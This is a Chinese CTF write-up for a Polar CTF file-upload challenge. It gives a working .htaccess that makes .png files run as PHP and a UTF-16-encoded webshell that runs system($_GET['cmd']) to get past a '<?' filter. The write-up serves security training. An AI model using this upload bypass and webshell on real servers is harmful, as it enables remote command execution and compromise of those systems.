polar CTF上传

发布时间:2023年12月29日

WEB-上传
一、查看题目信息

在这里插入图片描述

二、漏洞分析
经过上传测试发现,这题过滤掉了<?,这样正常的一句话木马就没法上传,这里可以用utf-16编码绕过。因为utf-16占utf-8的两倍长度,上传时默认检测为utf-8,从而就能绕过检测成功上传。

同时这题可以上传.htaccess,利用.htaccess文件去解析传上去的木马。

三、解题步骤
将配置文件与WebShell一起上传到同一文件夹。

.htaccess:

#define width 1337                
#define height 1337                   

AddType application/x-httpd-php .png 

php_value zend.multibyte 1            
php_value zend.detect_unicode 1       
php_value display_errors 1      

三、关于UTF-16的WebShell的制作
制作UTF-16的WebShell可以用编码器改变编码之后用WinHex写入到文件里,不要用文本编辑器,因为它可能会将空字节(0x00)转成空格(0x20)

1.png:

< ? p h p   s y s t e m ( $ _ G E T [ ' c m d ' ] ) ;   d i e ( ) ;   ? >
文章来源:https://blog.csdn.net/qq_36286161/article/details/135291396
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。